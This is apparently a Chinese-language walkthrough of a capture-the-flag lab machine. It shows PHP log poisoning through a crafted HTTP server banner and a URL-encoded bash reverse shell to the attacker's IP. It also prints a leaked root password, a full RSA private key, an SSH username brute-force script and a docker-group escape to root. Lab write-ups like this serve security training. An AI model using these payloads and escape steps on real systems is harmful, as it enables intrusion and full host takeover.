难度:meduom

kali:192.168.0.106

靶机:192.168.56.101

端口扫描

root@kali2 [~] ➜  nmap 192.168.0.101                         [11:39:56]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 11:39 CST
Nmap scan report for point.nyx (192.168.0.101)
Host is up (0.000090s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

日志rce

/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10701]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
/Anonymous-Connections (Status: 301) [Size: 330] [--> http://192.168.0.101/Anonymous-Connections/]

81308c16f3550c07e33c141d669c2e98.png
根据结果可以知道是一个nmap的扫描

/victims              (Status: 301) [Size: 338] [--> http://192.168.0.101/Anonymous-Connections/victims/]

再扫一遍目录可以得到日志目录
2f3c8a45594daeb5abe0873b4de8119a.png
那么这时候就有人问了,主播主播,这个日志会不会被php解析啊
会的会的,扫描结果随便找个字段尝试修改,于是我尝试修改http表头SimpleHTTPServer 0.6 (Python 3.11.9)

from http.server import HTTPServer, SimpleHTTPRequestHandler

class CustomHandler(SimpleHTTPRequestHandler):
    server_version = "<?php phpinfo();?>"
    sys_version = ""

httpd = HTTPServer(("0.0.0.0", 80), CustomHandler)
print("Serving on port 80...")
httpd.serve_forever()

2ef53f6c32c1e5ac31fc1c295ac59a85.png
再看日志确实解析了,于是反弹shell

from http.server import HTTPServer, SimpleHTTPRequestHandler

class CustomHandler(SimpleHTTPRequestHandler):
    server_version = "<?php system($_GET[1]);?>"
    sys_version = ""

httpd = HTTPServer(("0.0.0.0", 80), CustomHandler)
print("Serving on port 80...")
httpd.serve_forever()
http://192.168.0.101/Anonymous-Connections/victims/192.168.0.106.log?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.106%2F4567%20%200%3E%261%27
hacktivist@debian1:/var/www/html$ cat .htaccess 
AddType application/x-httpd-php .log

这就是为什么log会被解析了

hacktivist@debian1:/home/hacktivist$ cat .bash_history 
 
hacktivist@debian1:/home/hacktivist$ cat .sudo_as_admin_successful 
hacktivist@debian1:/home/hacktivist$ sudo -l
Matching Defaults entries for hacktivist on debian1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User hacktivist may run the following commands on debian1:
    (ALL : ALL) NOPASSWD: ALL
hacktivist@debian1:/home/hacktivist$ sudo su

不过拿到的是一个docker,扫一下内网

{icmp} 10.10.10.1      up
{icmp} 10.10.10.10     up
{icmp} 10.10.10.20     up

有三个机器,当前是10找个机器,搭个隧道都看一下
10.10.10.1跟外网一样,同一样再打一遍进入找个机器

ssh爆破+docker逃逸

 root@debian1:~# cat .bash_history 
echo 'root:$uP3r_$3cUr3_D0ck3r' | chpasswd
cd
nano .bash_history 
exit

拿到一个密码,猜测是20机器的,扫了一下,ssh端口是2222

root@debian2:~/.ssh# cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAka2UWifZhkBCszlEWwhay91iCnRKXAlPkYRCrIYx2K8ElWv7
Cz6kzzLQhTdgCADpOZGJlsVnHeBUV2b5LoefoSSrcjgpM8g/55V+yUR/VOE46ZjW
yYwMCouvP4jmAQa40fmPCWBvKaMh0DQHBb5yrhS4rmEZdn7v6nyBaArQgCXFlYM9
NMirGtH6cKhKq9fgp2yEDfyvluq2DNZHcMwhPB9mFEOEjQsJ4DlRod0WeFJSVZSy
TCe/2sDRxYGEHsPyMJYs4ruAHInUJIYBCwsPredsEmNrxENjirpp8PjTIpC+kXBE
gLGIcjzunzT2M3L7HMCjGnJ4AV8nzykjkmD9jQIDAQABAoIBAHON3Zx5+ajtNjtW
FKuk/+iwLcGfJxDEbfI+mGijdcysX5Vq9tKfmTml1BOnriwLFPUORbZr1XS0ahJ+
YvAOsoevP7O1arFhiZdYVR6vj9UzZeKd0tpClZaT4KokHFX6EAa2z0gfz22Wsg6m
Bl//BpahZzEjYoBFBmfY5QkzctoCZQRhkTAhR520+oCFiosHGyiH6QCGYsO6WmwQ
7w7cm7rQ/MLNkgenRFUm0PRXrqti2K3kFUnU/Pfb9k4DoUtKSjpvA3kNbH9pIxlN
skbCJJfJeQpalBKwQyGqNkCzH9qMm31ZuLHsp6L73po2rWFIcoeraLhA/5No+S21
+v01t30CgYEA5mtTtslQmR2xhVr69z1lDdaFFaGsUWH5vlIGBvphAQsl2OwUbWk/
7rLy4yhddEYTfyc5xorkRsjmNjNyhMrtYks1ycvtEvCee7NuGHSO0Grzp3MKbAAY
t/gmGMckr9zdcsVVCIshm8PYo4feXClrHMe0MWLv97kcgGWvGLH+4UcCgYEAodnZ
dPL9J/O83kO5zybWlUL4RoIGLdP2axqNxoDju87qKNTKdsrKnmNV5NlQ+VH05eZ/
gQ5ninqFAR0hsvf4AHYmjySwY6S6mGnrXlhYkUE37crHVxdQruvtgUk4cTB0Lbk9
Vg0LoAnCJr96nJSWVcpER/p7/KD1LIcU/4oT9IsCgYEAlCT9NdBJWaiVsj/Ei6GV
j0gVWMsRl2F+yLbD2UixhZI9SzK+D3pT+IxlTVdufotvjZkStGwoSLpyCPca8fXm
mgPxGUVbr4m026OJbX/DMo0RCuAUG0wUmHObSuL+23MNjfUBrvSFLzjD2KBKfsbC
b0aWvAn4bzU89fBqm14VmZECgYEAn1T7+2J+j8cl5lUb5W9hjb1I9vhnptPk4VlZ
utIF30x6PkoFKt7GixhVZZ3+VgM1qOG6Ic2RZsTojMkl9K6iSaoGmaJPtzhirUqQ
d+dXAWAH9CNNDFKajikaPc1cMCm4JY8Xb9AV4q3YoRadWOn5+WjOwWE4j+HQms48
gLhonrMCgYEAthB9GOhxzeX5VEaw91tWhAdD+WNEO9TMN9fsyE9cISddgmBA5ozh
aTJl/gt09UodQhCNTmjYGByTkzGPH5c01HVhWfompn3GmK3jKwTbrUYh+P13Q1vn
A6j+O3UaX0P8w4seXeGyU2DA9iWCkwiKUUb4nj5IWt50Khmjv7BaXog=
-----END RSA PRIVATE KEY-----

拿到一个私钥,于是爆破用户名
群里偷了一个脚本爆破出用户名alfredo

#!/bin/bash

host=192.168.0.101
user_file=/usr/share/seclists/Usernames/Names/names.txt
id_rsa_file=/tmp/aaa


while read i
do
    timeout 1 ssh ${i}@$host -i $id_rsa_file id &>/dev/null
    if [ $? -eq 0 ];then
        echo "[+]Found: $i"
        break
    else
        echo "[-]test:  $i"
    fi
    sleep 0.1
done < $user_file
alfredo@anon:~$ cat user.txt 
af13f20ce2fb4266b4d381cf8f60f85f
alfredo@anon:~$ id
uid=1000(alfredo) gid=1000(alfredo) grupos=1000(alfredo),109(docker)

docker逃逸一下

alfredo@anon:~$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED        SIZE
debian2      latest    8862ed54f766   43 hours ago   117MB
debian1      latest    62c15a42ee05   43 hours ago   117MB
debian       latest    18f9bd665a29   3 days ago     117MB
alfredo@anon:~$ docker run -v /:/mnt --rm -it debian2 chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)